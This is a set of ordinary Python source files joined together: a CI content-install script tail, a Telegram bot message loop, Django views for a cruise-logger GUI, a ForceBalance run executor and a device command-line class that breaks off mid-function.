modified_module_instances.extend(new_module_instances)
successful_tests_post, failed_tests_post = instance_testing(build, modified_module_instances, pre_update=False)
return successful_tests_post, failed_tests_post
def update_content_on_servers(build: Build) -> bool:
"""
Updates content on the build's server according to the server version
Args:
build: Build object
Returns:
A boolean that indicates whether the content installation was successful.
If the server version is lower then 5.9.9 will return the 'installed_content_packs_successfully' parameter as is
If the server version is higher or equal to 6.0 - will return True if the packs installation was successful
both before that update and after the update.
"""
installed_content_packs_successfully = True
if LooseVersion(build.server_numeric_version) < LooseVersion('6.0.0'):
update_content_till_v6(build)
elif not build.is_nightly:
set_marketplace_url(build.servers, build.branch_name, build.ci_build_number)
installed_content_packs_successfully = install_packs(build)
return installed_content_packs_successfully
@run_with_proxy_configured
def configure_and_test_integrations_pre_update(build: Build, new_integrations, modified_integrations) -> tuple:
"""
Configures integration instances that exist in the current version and for each integration runs 'test-module'.
Args:
build: Build object
new_integrations: A list containing new integrations names
modified_integrations: A list containing modified integrations names
Returns:
A tuple consists of:
* A list of modified module instances configured
* A list of new module instances configured
* A list of integrations that have failed the 'test-module' command execution
* A list of integrations that have succeeded the 'test-module' command execution
* A list of new integrations names
"""
tests_for_iteration = get_tests(build)
modified_module_instances, new_module_instances = configure_server_instances(build,
tests_for_iteration,
new_integrations,
modified_integrations)
successful_tests_pre, failed_tests_pre = instance_testing(build, modified_module_instances, pre_update=True)
return modified_module_instances, new_module_instances, failed_tests_pre, successful_tests_pre
def install_packs_pre_update(build: Build) -> bool:
"""
Install packs on server according to server version
Args:
build: A build object
Returns:
A boolean that indicates whether the installation was successful or not
"""
installed_content_packs_successfully = False
if LooseVersion(build.server_numeric_version) >= LooseVersion('6.0.0'):
if build.is_nightly:
install_nightly_pack(build)
installed_content_packs_successfully = True
else:
if not build.is_private:
pack_ids = get_non_added_packs_ids(build)
installed_content_packs_successfully = install_packs(build, pack_ids=pack_ids)
else:
installed_content_packs_successfully = True
return installed_content_packs_successfully
def main():
install_logging('Install_Content_And_Configure_Integrations_On_Server.log')
build = Build(options_handler())
configure_servers_and_restart(build)
disable_instances(build)
installed_content_packs_successfully = install_packs_pre_update(build)
new_integrations, modified_integrations = get_changed_integrations(build)
pre_update_configuration_results = configure_and_test_integrations_pre_update(build,
new_integrations,
modified_integrations)
modified_module_instances, new_module_instances, failed_tests_pre, successful_tests_pre = pre_update_configuration_results
installed_content_packs_successfully = update_content_on_servers(build) and installed_content_packs_successfully
successful_tests_post, failed_tests_post = test_integrations_post_update(build,
new_module_instances,
modified_module_instances)
success = report_tests_status(failed_tests_pre, failed_tests_post, successful_tests_pre, successful_tests_post,
new_integrations)
if not success or not installed_content_packs_successfully:
sys.exit(2)
if __name__ == '__main__':
main()
|
loop.py | import sys
import time
import json
import threading
import traceback
import collections
try:
import Queue as queue
except ImportError:
import queue
from . import exception
from . import _find_first_key, flavor_router
class RunForeverAsThread(object):
def run_as_thread(self, *args, **kwargs):
t = threading.Thread(target=self.run_forever, args=args, kwargs=kwargs)
t.daemon = True
t.start()
class CollectLoop(RunForeverAsThread):
def __init__(self, handle):
self._handle = handle
self._inqueue = queue.Queue()
@property
def input_queue(self):
return self._inqueue
def run_forever(self):
while 1:
try:
msg = self._inqueue.get(block=True)
self._handle(msg)
except:
traceback.print_exc()
class GetUpdatesLoop(RunForeverAsThread):
def __init__(self, bot, on_update):
self._bot = bot
self._update_handler = on_update
def run_forever(self, relax=0.1, offset=None, timeout=20, allowed_updates=None):
"""
Process new updates in infinity loop
:param relax: float
:param offset: int
:param timeout: int
:param allowed_updates: bool
"""
while 1:
try:
result = self._bot.getUpdates(offset=offset,
timeout=timeout,
allowed_updates=allowed_updates)
# Once passed, this parameter is no longer needed.
allowed_updates = None
# No sort. Trust server to give messages in correct order.
for update in result:
self._update_handler(update)
offset = update['update_id'] + 1
except exception.BadHTTPResponse as e:
traceback.print_exc()
# Servers probably down. Wait longer.
if e.status == 502:
time.sleep(30)
except:
traceback.print_exc()
finally:
time.sleep(relax)
def _dictify3(data):
if type(data) is bytes:
return json.loads(data.decode('utf-8'))
elif type(data) is str:
return json.loads(data)
elif type(data) is dict:
return data
else:
raise ValueError()
def _dictify27(data):
if type(data) in [str, unicode]:
return json.loads(data)
elif type(data) is dict:
return data
else:
raise ValueError()
_dictify = _dictify3 if sys.version_info >= (3,) else _dictify27
def _extract_message(update):
key = _find_first_key(update, ['message',
'edited_message',
'channel_post',
'edited_channel_post',
'callback_query',
'inline_query',
'chosen_inline_result',
'shipping_query',
'pre_checkout_query',
'poll',
'poll_answer',
'my_chat_member',
'chat_member'])
return key, update[key]
def _infer_handler_function(bot, h):
if h is None:
return bot.handle
elif isinstance(h, dict):
return flavor_router(h)
else:
return h
class MessageLoop(RunForeverAsThread):
def __init__(self, bot, handle=None):
self._bot = bot
self._handle = _infer_handler_function(bot, handle)
def run_forever(self, *args, **kwargs):
"""
:type relax: float
:param relax: seconds between each :meth:`.getUpdates`
:type offset: int
:param offset:
initial ``offset`` parameter supplied to :meth:`.getUpdates`
:type timeout: int
:param timeout:
``timeout`` parameter supplied to :meth:`.getUpdates`, controlling
how long to poll.
:type allowed_updates: array of string
:param allowed_updates:
``allowed_updates`` parameter supplied to :meth:`.getUpdates`,
controlling which types of updates to receive.
Calling this method will block forever. Use :meth:`.run_as_thread` to
run it non-blockingly.
"""
collectloop = CollectLoop(self._handle)
updatesloop = GetUpdatesLoop(self._bot,
lambda update:
collectloop.input_queue.put(_extract_message(update)[1]))
# feed messages to collect loop
# feed events to collect loop
self._bot.scheduler.on_event(collectloop.input_queue.put)
self._bot.scheduler.run_as_thread()
updatesloop.run_as_thread(*args, **kwargs)
collectloop.run_forever() # blocking
class Webhook(RunForeverAsThread):
def __init__(self, bot, handle=None):
self._bot = bot
self._collectloop = CollectLoop(_infer_handler_function(bot, handle))
def run_forever(self):
# feed events to collect loop
self._bot.scheduler.on_event(self._collectloop.input_queue.put)
self._bot.scheduler.run_as_thread()
self._collectloop.run_forever()
def feed(self, data):
update = _dictify(data)
self._collectloop.input_queue.put(_extract_message(update)[1])
class Orderer(RunForeverAsThread):
def __init__(self, on_ordered_update):
self._on_ordered_update = on_ordered_update
self._inqueue = queue.Queue()
@property
def input_queue(self):
return self._inqueue
def run_forever(self, maxhold=3):
def handle(update):
self._on_ordered_update(update)
return update['update_id']
# Here is the re-ordering mechanism, ensuring in-order delivery of updates.
max_id = None # max update_id passed to callback
buffer = collections.deque() # keep those updates which skip some update_id
qwait = None # how long to wait for updates,
# because buffer's content has to be returned in time.
while 1:
try:
update = self._inqueue.get(block=True, timeout=qwait)
if max_id is None:
# First message received, handle regardless.
max_id = handle(update)
elif update['update_id'] == max_id + 1:
# No update_id skipped, handle naturally.
max_id = handle(update)
# clear contagious updates in buffer
if len(buffer) > 0:
buffer.popleft() # first element belongs to update just received, useless now.
while 1:
try:
if type(buffer[0]) is dict:
max_id = handle(buffer.popleft()) # updates that arrived earlier, handle them.
else:
break # gap, no more contagious updates
except IndexError:
break # buffer empty
elif update['update_id'] > max_id + 1:
# Update arrives pre-maturely, insert to buffer.
nbuf = len(buffer)
if update['update_id'] <= max_id + nbuf:
# buffer long enough, put update at position
buffer[update['update_id'] - max_id - 1] = update
else:
# buffer too short, lengthen it
expire = time.time() + maxhold
for a in range(nbuf, update['update_id']-max_id-1):
buffer.append(expire) # put expiry time in gaps
buffer.append(update)
else:
pass # discard
except queue.Empty:
# debug message
# print('Timeout')
# some buffer contents have to be handled
# flush buffer until a non-expired time is encountered
while 1:
try:
if type(buffer[0]) is dict:
max_id = handle(buffer.popleft())
else:
expire = buffer[0]
if expire <= time.time():
max_id += 1
buffer.popleft()
else:
break # non-expired
except IndexError:
break # buffer empty
except:
traceback.print_exc()
finally:
try:
# don't wait longer than next expiry time
qwait = buffer[0] - time.time()
if qwait < 0:
qwait = 0
except IndexError:
# buffer empty, can wait forever
qwait = None
# debug message
# print ('Buffer:', str(buffer), ', To Wait:', qwait, ', Max ID:', max_id)
class OrderedWebhook(RunForeverAsThread):
def __init__(self, bot, handle=None):
self._bot = bot
self._collectloop = CollectLoop(_infer_handler_function(bot, handle))
self._orderer = Orderer(lambda update:
self._collectloop.input_queue.put(_extract_message(update)[1]))
# feed messages to collect loop
def run_forever(self, *args, **kwargs):
"""
:type maxhold: float
:param maxhold:
The maximum number of seconds an update is held waiting for a
not-yet-arrived smaller ``update_id``. When this number of seconds
is up, the update is delivered to the message-handling function
even if some smaller ``update_id``\s have not yet arrived. If those
smaller ``update_id``\s arrive at some later time, they are discarded.
Calling this method will block forever. Use :meth:`.run_as_thread` to
run it non-blockingly.
"""
# feed events to collect loop
self._bot.scheduler.on_event(self._collectloop.input_queue.put)
self._bot.scheduler.run_as_thread()
self._orderer.run_as_thread(*args, **kwargs)
self._collectloop.run_forever()
def feed(self, data):
"""
:param data:
One of these:
- ``str``, ``unicode`` (Python 2.7), or ``bytes`` (Python 3, decoded using UTF-8)
representing a JSON-serialized `Update <https://core.telegram.org/bots/api#update>`_ object.
- a ``dict`` representing an Update object.
"""
update = _dictify(data)
self._orderer.input_queue.put(update)
|
views.py | import json
import logging
import multiprocessing
import os
import sys
import threading
import time
from json import JSONDecodeError
from signal import SIGTERM, SIGINT
from django.shortcuts import render
from django.http import HttpResponse
from django.views.decorators.csrf import csrf_exempt
sys.path.append('.')
from .models import Logger, LoggerConfig, LoggerConfigState
from .models import Mode, Cruise, CurrentCruise, CruiseState
from .models import LogMessage, ServerState
from server.logger_manager import LoggerManager
# Read in JSON with comments
from logger.utils.read_json import parse_json
from django_gui.settings import HOSTNAME, WEBSOCKET_SERVER
# Convenience dicts we pass to the server_message page to
# translate logging levels to names and colors.
LOG_LEVELS = {
0: 'ALL',
10: 'DEBUG',
20: 'INFO',
30: 'WARNING',
40: 'ERROR',
50: 'CRITICAL'
}
LOG_LEVEL_COLORS = {
0: '',
10: '',
20: '',
30: '#FFFF99',
40: '#FF9999',
50: '#FF6666'
}
############################
# We're going to interact with the Django DB via its API class
from .django_server_api import DjangoServerAPI
api = None
def log_request(request, cmd):
global api
user = request.user
host = request.get_host()
elements = ', '.join(['%s:%s' % (k,v) for k, v in request.POST.items()
if k not in ['csrfmiddlewaretoken']])
if api:
api.message_log(source='Django', user='(%s@%s)' % (user, host),
log_level=api.INFO, message='post: %s' % elements)
################################################################################
def index(request, cruise_id=None):
"""Home page - render logger states and cruise information.
"""
global api
if api is None:
api = DjangoServerAPI()
if not cruise_id:
template_vars = {
'websocket_server': WEBSOCKET_SERVER,
'cruise_id': '',
'cruise_list': api.get_cruises(),
'errors': '',
}
return render(request, 'django_gui/index.html', template_vars)
############################
# If we've gotten a POST request
if request.method == 'POST':
# First things first: log the request
log_request(request, cruise_id + ' index')
# Did we get a cruise selection?
if request.POST.get('select_cruise', None):
cruise_id = request.POST['select_cruise']
logging.info('switching to cruise "%s"', cruise_id)
# Are they deleting a cruise?(!)
if request.POST.get('delete_cruise', None):
logging.info('deleting cruise "%s"', cruise_id)
api.delete_cruise(request.POST['delete_cruise'])
# Did we get a mode selection?
elif request.POST.get('select_mode', None):
new_mode_name = request.POST['select_mode']
logging.info('switching to mode "%s"', new_mode_name)
api.set_mode(cruise_id, new_mode_name)
# Else unknown post
else:
logging.warning('Unknown POST request: %s', request.POST)
# Now assemble the information needed to display the page.
cruise_list = api.get_cruises()
modes = api.get_modes(cruise_id)
current_mode = api.get_mode(cruise_id)
# Get config corresponding to current mode for each logger
loggers = {}
for logger_id in api.get_loggers(cruise_id):
logger_config = api.get_logger_config_name(cruise_id, logger_id)
loggers[logger_id] = logger_config
logging.warning('config for %s is %s', logger_id, logger_config)
template_vars = {
'is_superuser': True,
'websocket_server': WEBSOCKET_SERVER,
'cruise_id': cruise_id,
'cruise_list': cruise_list,
'modes': modes,
'current_mode': current_mode,
'loggers': loggers,
#'status_server_running': get_server_state('StatusServer').running,
#'logger_server_running': get_server_state('LoggerServer').running,
'errors': '',
}
return render(request, 'django_gui/index.html', template_vars)
################################################################################
run_servers_object = None
run_servers_process = None
################################################################################
# To start/stop/monitor servers
# NOTE: Starting/stopping the ServerRunner process (django_gui/run_servers.py)
# is not yet working. You'll need to start/stop it manually for now.
def servers(request):
global run_servers_object, run_servers_process
# If we've gotten a POST request, check for new desired_state
if request.method == 'POST':
if request.POST.get('start', None):
# Start the run_servers process
logging.warning('Starting servers')
if run_servers_object:
logging.warning('Killing existing run_servers process')
run_servers_object.quit()
#run_servers_object = ServerRunner()
#multiprocessing.set_start_method('spawn')
#run_servers_process = \
# multiprocessing.Process(target=run_servers_object.start)
#run_servers_process.start()
if request.POST.get('stop', None):
# Stop any run_servers process
logging.warning('Stopping servers')
if run_servers_object:
logging.warning('Asking StatusServer and LoggerServer to shut down')
ServerState(server='StatusServer', running=True, desired=False).save()
ServerState(server='LoggerServer', running=True, desired=False).save()
time.sleep(1)
logging.warning('Killing existing run_servers process')
#run_servers_process.terminate()
template_vars = {'websocket_server': WEBSOCKET_SERVER}
# Render what we've ended up with
return render(request, 'django_gui/servers.html', template_vars)
################################################################################
# Page to display messages from the specified server
def server_messages(request, log_level=logging.INFO, source=None):
template_vars = {'websocket_server': WEBSOCKET_SERVER,
'log_level': log_level,
'log_levels': LOG_LEVELS,
'log_level_colors': LOG_LEVEL_COLORS,
'source': source}
return render(request, 'django_gui/server_messages.html', template_vars)
################################################################################
def edit_config(request, cruise_id, logger_id):
global api
if api is None:
api = DjangoServerAPI()
############################
# If we've gotten a POST request, they've selected a new config
if request.method == 'POST':
# First things first: log the request
log_request(request, '%s:%s edit_config' % (cruise_id, logger_id))
# Now figure out what they selected
new_config = request.POST['select_config']
logging.warning('selected config: %s', new_config)
api.set_logger_config_name(cruise_id, logger_id, new_config)
# Close window once we've done our processing
return HttpResponse('<script>window.close()</script>')
# What's our current mode? What's the default config for this logger
# in this mode?
config_options = api.get_logger_config_names(cruise_id, logger_id)
current_config = api.get_logger_config_name(cruise_id, logger_id)
current_mode = api.get_mode(cruise_id)
default_config = api.get_logger_config_name(cruise_id, logger_id,
current_mode)
return render(request, 'django_gui/edit_config.html',
{'cruise_id': cruise_id,
'logger_id': logger_id,
'current_config': current_config,
'default_config': default_config,
'config_options': config_options
})
################################################################################
def load_cruise_config(request):
global api
if api is None:
api = DjangoServerAPI()
# If not a POST, just draw the page
if not request.method == 'POST':
return render(request, 'django_gui/load_cruise_config.html', {})
# If POST, we've expect there to be a file to process
else:
errors = []
# Did we get a configuration file?
if request.FILES.get('config_file', None):
config_file = request.FILES['config_file']
config_contents = config_file.read()
logging.warning('Uploading file "%s"...', config_file.name)
try:
config = parse_json(config_contents.decode('utf-8'))
api.load_cruise(config, config_file.name)
except JSONDecodeError as e:
errors.append(str(e))
except ValueError as e:
errors.append(str(e))
# If no errors, close window - we're done.
if not errors:
return HttpResponse('<script>window.close()</script>')
else:
errors.append('No configuration file selected')
# If here, there were errors
return render(request, 'django_gui/load_cruise_config.html',
{'errors': ';'.join(errors)})
################################################################################
def widget(request, field_list=''):
global logger_server
template_vars = {
'field_list': field_list,
'is_superuser': True,
'websocket_server': WEBSOCKET_SERVER,
}
# Render what we've ended up with
return render(request, 'django_gui/widget.html', template_vars)
|
fb_executor.py | """
fb_executor module
This is built for interfacing with the ForceBalance command line interface.
"""
import os
import shutil
import subprocess
import time
import copy
import threading
import numpy as np
from forcebalance.nifty import lp_load
from forcebalance.parser import gen_opts_types, tgt_opts_types
from forcebalance.molecule import Molecule
class FBExecutor:
""" Class designed for executing ForceBalance in command line.
1. Check the files in an existing project folder, find the status.
2. Execute ForceBalance program in a subprocess.
3. Monitor the output and tmp files, send callback signals to FBProject.
"""
STATUS_SET = {'IDLE', 'RUNNING', 'FINISHED', 'ERROR'}
@property
def status(self):
return self._status
@status.setter
def status(self, value):
assert value in self.STATUS_SET, f'Invalid status value. Choices are: {self.STATUS_SET}'
self._status = value
self.notify_observer('status_update')
def __init__(self, root_folder, interval=1, prefix='fb'):
self.root_folder = root_folder
self.interval = interval
self.prefix = prefix
self._observer = None
# some file names
self.checkpoint_fnm = 'checkpoint.p'
self.input_file = os.path.join(self.root_folder, prefix+'.in')
self.tmp_folder = os.path.join(self.root_folder, prefix+'.tmp')
self.output_file = os.path.join(self.root_folder, prefix+'.out')
self.result_folder = os.path.join(self.root_folder, 'result')
self.files_to_clean = [os.path.join(self.root_folder, f) for f in [prefix+'.err', prefix+'.bak', prefix+'.sav', 'restart.p']]
# input options
self.input_options = {'gen_opt': {}, 'priors': {}, 'tgt_opts': {}}
# try to load input file
self.read_input_options()
# self.read_tmp_folder()
# read status from output file
self.read_output_file()
# store the status of work queue
self._workqueue_status = {
'worker_running': 0,
'worker_total': 0,
'job_finished': 0,
'job_total': 0
}
# try to load self.obj_hist and self.mvals_hist from tmp folder
# this is slow so we try to do it in thread
# this should be done in the last step
self.obj_hist = {}
self.mvals_hist = {}
self.lock = threading.Lock()
def finish_loading_in_thread(self):
"""
Finish loading tmp folder then notify project.
This function runs in a separate thread.
"""
def thread_func():
self.read_tmp_folder()
self.notify_observer('iter_update')
self.notify_observer('status_update')
with self.lock:
thread = threading.Thread(target=thread_func)
thread.start()
def thread_safe(self):
""" Decorator to make sure function runs with thread safety """
def new_func(self, *args, **kwargs):
with self.lock:
return func(self, *args, **kwargs)
return new_func
def register_observer(self, observer):
""" register an observer function to handle events """
self._observer = observer
def notify_observer(self, msg):
""" Notify the observer by a message """
if self._observer is not None:
self._observer(msg)
def read_input_options(self):
""" Read input options from self.input_file """
if not os.path.exists(self.input_file): return
# aggregate the option types
gen_opt_type_mapping = {}
for type_name, type_opts in gen_opts_types.items():
for opt_name in type_opts:
vtype = int if type_name == 'ints' else \
float if type_name == 'floats' else \
bool if type_name == 'bools' else \
str
gen_opt_type_mapping[opt_name] = vtype
tgt_opt_type_mapping = {}
for type_name, type_opts in tgt_opts_types.items():
for opt_name in type_opts:
vtype = int if type_name == 'ints' else \
float if type_name == 'floats' else \
bool if type_name == 'bools' else \
str
tgt_opt_type_mapping[opt_name] = vtype
# start reading file
with open(self.input_file) as f_in:
reading_dest_name = None
reading_dest = None
tgt_opt_list = []
for line in f_in:
content = line.split('#', maxsplit=1)[0].strip()
if content:
content_lower = content.lower()
if content_lower == '$options':
reading_dest_name = 'gen_opt'
reading_dest = self.input_options['gen_opt']
elif content_lower == 'priors':
reading_dest_name = 'priors'
reading_dest = self.input_options['priors']
elif content_lower == '/priors':
reading_dest_name = 'gen_opt'
reading_dest = self.input_options['gen_opt']
elif content_lower == '$target':
reading_dest_name = 'tgt_opt'
reading_dest = {}
tgt_opt_list.append(reading_dest)
elif content_lower == '$end':
reading_dest_name = None
reading_dest = None
else:
ls = content.split()
key = ls[0]
if reading_dest_name == 'priors':
value = float(ls[-1])
else:
if reading_dest_name == 'gen_opt':
vtype = gen_opt_type_mapping[key]
elif reading_dest_name == 'tgt_opt':
vtype = tgt_opt_type_mapping[key]
else:
raise ValueError(f"Input line not in any block:\n{line}")
if len(ls) == 1:
assert vtype == bool
value = True
elif len(ls) == 2:
if vtype == bool:
value = not (ls[1].lower() in {'0', 'false', 'no', 'off'})
else:
value = vtype(ls[1])
else:
value = list(map(vtype, ls[1:]))
reading_dest[key] = value
# insert all options from tgt_opt_list to self.input_options
for tgt_opts in tgt_opt_list:
name = tgt_opts.get('name')
assert name, f"target name missing in {tgt_opts}"
# ensure all targets has the weight option
tgt_opts.setdefault('weight', 1.0)
# ensure all target types are upper case
tgt_opts['type'] = tgt_opts['type'].upper()
self.input_options['tgt_opts'][name] = tgt_opts
# ensure the gen_opt['jobtype'] is uppercase and OPTIMIZE instead of NEWTON
jobtype = self.input_options['gen_opt']['jobtype'].upper()
if jobtype == 'NEWTON':
jobtype = "OPTIMIZE"
self.input_options['gen_opt']['jobtype'] = jobtype
# ensure penalty_type is uppercase
penalty_type = self.input_options['gen_opt'].get('penalty_type')
if penalty_type is not None:
self.input_options['gen_opt']['penalty_type'] = penalty_type.upper()
# ensure forcefield is in a list
ff_fnms = self.input_options['gen_opt']['forcefield']
if isinstance(ff_fnms, str):
self.input_options['gen_opt']['forcefield'] = [ff_fnms]
# check if normalize_weights is set, we don't support this yet
if self.input_options['gen_opt'].get('normalize_weights') is True:
raise ValueError("normalize_weights is not supported yet")
print(self.input_options['gen_opt'])
def set_input_options(self, gen_opts, priors, tgt_opts):
self.input_options['gen_opts'].update(gen_opts)
self.input_options['priors'].update(priors)
self.input_options['tgt_opts'].update(tgt_opts)
def write_input_file(self):
""" Write self.input_options as an input file """
gen_opts = self.input_options['gen_opts'].copy()
# add a few fields to ensure checkpoint writing
gen_opts.update({
'writechk_step': True,
'writechk': self.checkpoint_fnm,
})
with open(self.input_file, 'w') as f:
f.write('$options\n')
# write general options
for key, value in gen_opts.items():
value_str = ' '.join(map(str, value)) if isinstance(value, (list, tuple)) else str(value)
f.write(f"{key:<30s} {value_str}\n")
# write the priors section
f.write('priors\n')
for rule, value in self.input_options['priors'].items():
f.write(f" {rule:<35s} : {value:.1e}\n")
f.write('/priors\n')
f.write('$end\n\n')
for tgt_opts in self.input_options['tgt_opts'].values():
# make a copy and set a high writelevel for details
tgt_opts = copy.deepcopy(tgt_opts)
tgt_opts['writelevel'] = 3
f.write('$target\n')
for key, value in tgt_opts.items():
value_str = ' '.join(map(str, value)) if isinstance(value, (list, tuple)) else str(value)
f.write(f"{key:<30s} {value_str}\n")
f.write('$end\n\n')
def read_tmp_folder(self):
""" Update self.obj_hist and self.mval_hist by reading tmp folder """
t0 = time.time()
if not os.path.exists(self.tmp_folder):
print(f"tmp folder {self.tmp_folder} not found")
return
# read information for each target
target_names = self.input_options['tgt_opts'].keys()
for target_name in target_names:
tgt_folder_path = os.path.join(self.tmp_folder, target_name)
for iter_folder in os.listdir(tgt_folder_path):
iter_folder_path = os.path.join(tgt_folder_path, iter_folder)
if os.path.isdir(iter_folder_path) and iter_folder.startswith('iter_'):
opt_iter = int(iter_folder.split('_')[1])
# read objective.p
target_objective = self.load_target_objective(target_name, opt_iter)
if target_objective is not None:
# create obj_hist item if not exist
self.obj_hist.setdefault(opt_iter, {})
# put targets objective value, weight and gradients into obj_hist
self.obj_hist[opt_iter][target_name] = {
'x': target_objective['X'],
'w': float(self.input_options['tgt_opts'][target_name]['weight']),
'grad': target_objective['G'],
}
# load mval value into mval_hist if not exist
if opt_iter not in self.mvals_hist:
self.mvals_hist[opt_iter] = np.loadtxt(os.path.join(iter_folder_path, 'mvals.txt'))
print(f"@@ read_tmp_folder {self.tmp_folder} finished ({time.time() - t0:.2f} s)")
def read_output_file(self):
""" Read output file to determine current status """
if os.path.exists(self.output_file):
with open(self.output_file) as fout:
lines = fout.readlines()
ending_content = '\n'.join(lines[-10:])
if "Calculation Finished." in ending_content:
self.status = 'FINISHED'
elif "I have not failed." in ending_content:
self.status = 'FINISHED'
self.not_converged = True
else:
self.status = 'ERROR'
else:
self.status = 'IDLE'
@thread_safe
def clean_up(self):
""" Remove ALL output and temporary files """
for f in [self.output_file, self.tmp_folder, self.result_folder] + self.files_to_clean:
if os.path.isfile(f):
os.remove(f)
elif os.path.isdir(f):
shutil.rmtree(f)
@thread_safe
def run(self):
""" Start the ForceBalance run in subprocess """
assert os.path.exists(self.input_file), f'ForceBalance input file {self.input_file} does not exist'
self.status = "RUNNING"
self.proc = subprocess.Popen(['ForceBalance', f'{self.prefix}.in'], cwd=self.root_folder, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
self.obj_hist = {}
self.mvals_hist = {}
self.monitor()
def monitor(self):
if not hasattr(self, 'proc'): return
# check stdout and stderr pipes, send data to frontend
for line in self.proc.stdout:
line = line.decode()
if 'Writing the checkpoint file' in line:
self.get_iter_update()
elif "Calculation Finished." in line:
self.status = 'FINISHED'
elif "I have not failed." in line:
self.status = 'FINISHED'
self.not_converged = True
elif "error" in line:
self.status = 'ERROR'
elif "workers busy" in line and "jobs complete" in line:
self.update_workqueue_status(line)
if self.proc.poll() is None:
return
# repeat the monitor
time.sleep(self.interval)
self.monitor()
@thread_safe
def kill(self):
if not hasattr(self, 'proc'): return
self.proc.kill()
self.status = 'IDLE'
def get_iter_update(self):
""" Read the tmp folder during running, get updated information and trigger observer """
# update self.obj_hist
opt_iter = len(self.obj_hist)
self.obj_hist[opt_iter] = {}
for target_name, tgt_options in self.input_options['tgt_opts'].items():
target_objective = self.load_target_objective(target_name, opt_iter)
self.obj_hist[opt_iter][target_name] = {
'x': target_objective['X'],
'w': float(tgt_options['weight']),
'grad': target_objective['G'],
}
# update self.mvals_hist
assert len(self.mvals_hist) == opt_iter, f'mvals_hist length {len(self.mvals_hist)} not consistent with obj_hist length {opt_iter}'
first_target_name = next(iter(self.input_options['tgt_opts']))
self.mvals_hist[opt_iter] = np.loadtxt(os.path.join(self.tmp_folder, first_target_name, f'iter_{opt_iter:04d}', 'mvals.txt'))
# trigger observer
self.notify_observer('iter_update')
def load_target_objective(self, target_name, opt_iter):
folder = os.path.join(self.tmp_folder, target_name, f'iter_{opt_iter:04d}')
if not os.path.isdir(folder):
raise RuntimeError(f"tmp folder {folder} does not exist")
obj_file = os.path.join(folder, 'objective.p')
if os.path.exists(obj_file):
obj_data = lp_load(obj_file)
else:
obj_data = None
return obj_data
def get_workqueue_status(self):
""" Get the number of running/total works of work queue """
return self._workqueue_status.copy()
def update_workqueue_status(self, line):
worker_info = line[:line.index('workers busy')].rsplit(maxsplit=1)[-1]
jobs_info = line[:line.index('jobs complete')].rsplit(maxsplit=1)[-1]
busy_worker, total_worker = map(int, worker_info.split('/'))
job_finished, job_total = map(int, jobs_info.split('/'))
self._workqueue_status = {
'worker_running': busy_worker,
'worker_total': total_worker,
'job_finished': job_finished,
'job_total': job_total
}
print(f"work queue status updated {self._workqueue_status}")
self.notify_observer('work_queue_update')
def get_target_objective_data(self, target_name, opt_iter):
""" Read objective data for a target and an optimization iteration from the tmp folder """
res = {}
target_options = self.input_options['tgt_opts'].get(target_name, None)
if target_options is None:
res['error'] = f"target {target_name} not found"
print(f"get_target_objective_data: {res['error']}")
return res
# check the tmp folder for this target
folder = os.path.join(self.tmp_folder, target_name, f'iter_{opt_iter:04d}')
if not os.path.isdir(folder):
res['error'] = f"tmp folder {folder} not found"
print(f"get_target_objective_data: {res['error']}")
return res
# get target type specific objective information
target_type = target_options['type']
if target_type.lower().startswith('abinitio'):
# read energy compare data
energy_compare_file = os.path.join(folder, 'EnergyCompare.txt')
if not os.path.isfile(energy_compare_file):
res['error'] = f"file {energy_compare_file} not found"
print(f"get_target_objective_data: {res['error']}")
return res
energy_compare_data = np.loadtxt(energy_compare_file)
res['qm_energies'] = energy_compare_data[:, 0].tolist()
res['mm_energies'] = energy_compare_data[:, 1].tolist()
res['diff'] = energy_compare_data[:, 2].tolist()
res['weights'] = energy_compare_data[:, 3].tolist()
# read molecule geometry
mol_file = os.path.join(folder, 'coords.xyz')
m = Molecule(mol_file)
# generate pdb string
if 'resname' not in m.Data:
m.Data['resname'] = ['MOL'] * m.na
m.Data['resid'] = [1] * m.na
res['pdbString'] = '\n'.join(m.write_pdb(range(m.na)))
else:
res['error'] = f"get objective data for target type {target_type} not implemented"
print(f"get_target_objective_data: {res['error']}")
return res
return res
|
cli.py | """
Command line entry
"""
#import asyncio
import threading
from os import getpid
import psutil
from .web import Webserver
from ..models import WebserverArgs
from ..framework.communicator import CommunicatorFactory
class CommandLine:
'''Command line entry class
'''
def __init__(self, **kwargs):
self.communication = 'uart'
self.device_provider = None
self.communicator = None
self.supported_commands = []
self.input_string = None
self.current_command = None
self._build_options(**kwargs)
self.webserver = Webserver(**kwargs)
self.webserver_running = False
def listen(self):
# find device
'''
Start to find device
'''
self.detect_device(self.device_discover_handler)
def detect_device(self, callback):
'''find if there is a connected device'''
if self.communicator is None:
self.communicator = CommunicatorFactory.create(
self.communication, self.options)
self.communicator.find_device(callback)
def device_discover_handler(self, device_provider):
'''
Handler after device discovered
'''
# check if device is in bootloader
# TODO: if in bootloader, only allow upgrade
# TODO: if a normal device, allow other commands
# load device provider
self.webserver.set_communicator(self.communicator)
self.webserver.load_device_provider(device_provider)
# setup command
#self.device_provider = device_provider
self.setup_command_handler()
def setup_command_handler(self):
'''
Prepare command
'''
self.supported_commands = self.webserver.device_provider.get_command_lines()
while True:
token = input(">>")
self.input_string = token.split(" ")
if token.strip() == 'exit':
break
if self.webserver_running and token.strip() != 'stop':
print("server is on-going, please stop it")
continue
for command in self.supported_commands:
if command['name'] == self.input_string[0]:
self.current_command = command
eval('self.%s()' % (command['function']))
break
else:
self.help_handler()
self.exit_handler()
return True
def start_webserver(self, current_loop):
'''
Start websocket server
'''
# asyncio.set_event_loop(asyncio.new_event_loop())
self.webserver.start_webserver(current_loop)
# if not current_loop.is_running():
# current_loop.run_forever()
def _build_options(self, **kwargs):
self.options = WebserverArgs(**kwargs)
# command handler
def help_handler(self):
'''
Help handler
'''
if len(self.supported_commands) > 0:
print("Usage: ")
for command in self.supported_commands:
print(command['name'] + " : " + command['description'])
else:
print("No more command line.")
def connect_handler(self):
'''
Connect to device, may no need it later
'''
print(self.webserver.device_provider.get_device_info())
def upgrade_handler(self):
'''upgrade command is used for firmware upgrade and followed by file name
'''
input_args = len(self.input_string)
if input_args == 1:
print("Usage:")
print("upgrade file_name")
else:
file_name = self.input_string[1]
# TODO: check device is idel
self.webserver.device_provider.upgrade_framework(file_name)
return True
def record_handler(self):
'''record command is used to save the outputs into local machine
'''
# TODO: check device is idel
if not self.webserver.device_provider.is_logging:
self.webserver.device_provider.start_data_log()
return True
def stop_handler(self):
'''record command is used to save the outputs into local machine
'''
# TODO: check device is idel
if self.webserver.device_provider.is_logging:
self.webserver.device_provider.stop_data_log()
if self.webserver_running:
